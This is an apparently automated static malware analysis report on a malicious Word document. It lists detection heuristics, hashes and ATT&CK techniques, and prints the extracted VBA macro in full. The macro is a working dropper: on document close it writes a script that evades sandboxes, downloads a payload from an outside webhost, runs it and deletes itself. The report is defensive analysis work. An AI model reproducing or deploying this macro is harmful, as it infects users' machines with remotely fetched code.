Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d6fe849df843b8f5…

MALICIOUS

Office (OOXML)

84.1 KB Created: 2021-06-07 18:05:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-06-17
MD5: e7d0a3488848ceaf735cd0c2cb19f7dd SHA-1: ef94c81b4abea013efca7ebb6919cc279e0d2967 SHA-256: d6fe849df843b8f519943ee6cc16e4813f3a7b5e0881620c63e4aaf66a377f19
390 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is a malicious Office document containing obfuscated VBA macros. The Document_Close subroutine attempts to download and write a VBScript file named 'HelpCenter.vbs' to the user's Documents folder. This script is designed to check for specific computer names and potentially execute further actions, indicating a downloader or dropper functionality.

Heuristics 10

  • VBA project inside OOXML medium 8 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    hwiqfhssaqE.Write "Set objShell = WScript.CreateObject(""WScript.Shell"")" & vbCrLf
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
            Result = "wscript.exe " & Chr(34) & qs & Chr(34)
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
    hwiqfhssaqE.Write "Set objShell = WScript.CreateObject(""WScript.Shell"")" & vbCrLf
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    hwiqfhssaqE.Write ".write xHttp.responseBody" & vbCrLf
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      Set nbhx28yw = CreateObject("Scripting.FileSystemObject")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    hwiqfhssaqE.Write "Set objWMIService = GetObject(""winmgmts:\\"" & strComputer & ""\root\cimv2"")" & vbCrLf
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
      hwiqfqqE = Environ("USERPROFILE") + "\Documents"
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
    • https://crabbier-airports.000webhostapp.com/index66.htmlReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4810 bytes
SHA-256: 2de5fb4e7598c3cc5b69717959ab4305d4744d0adc7efc643dc07d34ee4f16b0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Rem Attribute VBA_ModuleType=VBADocumentModule

Private Sub Document_Close()
    On Error Resume Next
    Dim wipsirdx
    Dim nbhx28yw
    Dim hwiqfqqE

  
  Set nbhx28yw = CreateObject("Scripting.FileSystemObject")
  hwiqfqqE = Environ("USERPROFILE") + "\Documents"
  If Not nbhx28yw.FileExists(Environ("USERPROFILE") + "\Documents\" + "tLLsm4W2.txt") Then
     If Not nbhx28yw.FolderExists(hwiqfqqE) Then nbhx28yw.CreateFolder (hwiqfqqE)

        qs = hwiqfqqE + "\HelpCenter.vbs"
        Dim hwiqfhssaqE As Object
        Set hwiqfhssaqE = nbhx28yw.CreateTextFile(qs, True, True)
hwiqfhssaqE.Write "strComputer = "".""" & vbCrLf
hwiqfhssaqE.Write "Set objWMIService = GetObject(""winmgmts:\\"" & strComputer & ""\root\cimv2"")" & vbCrLf
hwiqfhssaqE.Write "Set colItems = objWMIService.ExecQuery(""Select * from Win32_OperatingSystem"", , 48)" & vbCrLf
hwiqfhssaqE.Write "For Each objItem In colItems" & vbCrLf
hwiqfhssaqE.Write "named = objItem.CSName" & vbCrLf
hwiqfhssaqE.Write "numbproc = objItem.NumberOfProcesses" & vbCrLf
hwiqfhssaqE.Write "memory = objItem.TotalVisibleMemorySize" & vbCrLf

hwiqfhssaqE.Write "sArray = Array(""DESKTOP-DN3JK31"", ""DESKTOP-D"", ""DESKTOP-D2231"")" & vbCrLf
hwiqfhssaqE.Write "sFind = named" & vbCrLf
hwiqfhssaqE.Write "s = Join(sArray, ""|"")" & vbCrLf
hwiqfhssaqE.Write "If InStr(1, s, sFind, vbTextCompare) Then" & vbCrLf
'hwiqfhssaqE.Write "MsgBox ""yep""" & vbCrLf
hwiqfhssaqE.Write "Else" & vbCrLf
hwiqfhssaqE.Write "End If" & vbCrLf
hwiqfhssaqE.Write "Next" & vbCrLf

hwiqfhssaqE.Write "If memory < 4000000 Then" & vbCrLf
hwiqfhssaqE.Write "Set mFSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf
hwiqfhssaqE.Write "Call mFSO.DeleteFile(Wscript.ScriptFullName, True)" & vbCrLf
hwiqfhssaqE.Write "Wscript.Quit" & vbCrLf
hwiqfhssaqE.Write "Else" & vbCrLf
'hwiqfhssaqE.Write "MsgBox "">4gb""" & vbCrLf
hwiqfhssaqE.Write "End If" & vbCrLf

hwiqfhssaqE.Write "If numbproc < 28 Then" & vbCrLf
hwiqfhssaqE.Write "Set mFSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf
hwiqfhssaqE.Write "Call mFSO.DeleteFile(Wscript.ScriptFullName, True)" & vbCrLf
hwiqfhssaqE.Write "Wscript.Quit" & vbCrLf
hwiqfhssaqE.Write "Else" & vbCrLf
'hwiqfhssaqE.Write "MsgBox "">28""" & vbCrLf
hwiqfhssaqE.Write "End If" & vbCrLf

hwiqfhssaqE.Write "strComputer = "".""" & vbCrLf
hwiqfhssaqE.Write "Set objWMIService = GetObject(""winmgmts:\\"" & strComputer & ""\root\cimv2"")" & vbCrLf
hwiqfhssaqE.Write "Set colItems = objWMIService.ExecQuery(""Select * from Win32_DiskDrive"", , 48)" & vbCrLf
hwiqfhssaqE.Write "For Each objItem In colItems" & vbCrLf
hwiqfhssaqE.Write "disksize = objItem.Size" & vbCrLf
hwiqfhssaqE.Write "If disksize < 60000000000 Then" & vbCrLf
hwiqfhssaqE.Write "Set mFSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf
hwiqfhssaqE.Write "Call mFSO.DeleteFile(Wscript.ScriptFullName, True)" & vbCrLf
hwiqfhssaqE.Write "Wscript.Quit" & vbCrLf
hwiqfhssaqE.Write "Else" & vbCrLf
'hwiqfhssaqE.Write "MsgBox "">60gb""" & vbCrLf
hwiqfhssaqE.Write "End If" & vbCrLf
hwiqfhssaqE.Write "Next" & vbCrLf
'hwiqfhssaqE.Write "End Sub" & vbCrLf

hwiqfhssaqE.Write "Dim xHttp: Set xHttp = CreateObject(""microsoft.xmlhttp"")" & vbCrLf
hwiqfhssaqE.Write "Dim bStrm: Set bStrm = CreateObject(""Adodb.Stream"")" & vbCrLf
hwiqfhssaqE.Write "xHttp.Open ""GET"", ""https://crabbier-airports.000webhostapp.com/index66.html"", False" & vbCrLf
hwiqfhssaqE.Write "xHttp.Send" & vbCrLf
hwiqfhssaqE.Write "With bStrm" & vbCrLf
hwiqfhssaqE.Write ".Type = 1" & vbCrLf

hwiqfhssaqE.Write ".Open" & vbCrLf
hwiqfhssaqE.Write ".write xHttp.responseBody" & vbCrLf
hwiqfhssaqE.Write ".savetofile ""putty.vbs"", 2 " & vbCrLf
hwiqfhssaqE.Write "End With" & vbCrLf
hwiqfhssaqE.Write "Set objShell = WScript.CreateObject(""WScript.Shell"")" & vbCrLf
hwiqfhssaqE.Write "objShell.Run (""putty.vbs"")" & vbCrLf

hwiqfhssaqE.Write "Set mFSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf
hwiqfhssaqE.Write "Call mFSO.DeleteFile(Wscript.ScriptFullName, True)" & vbCrLf
hwiqfhssaqE.Write "Wscript.Quit" & vbCrLf
        hwiqfhssaqE.Close
        
        Set wipsirdx = CreateObject("WScript.Shell")
        Result = "wscript.exe " & Chr(34) & qs & Chr(34)
        wipsirdx.Run Result, 1, True

        Set mFSO = CreateObject("Scripting.FileSystemObject")
        Call mFSO.DeleteFile(Wscript.ScriptFullName, True)
        Wscript.Quit
        
    End If

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 14848 bytes
SHA-256: ca994a44001bd28a5f1efa9b3fe2633098980c67af079d79d7817cbf8e0be322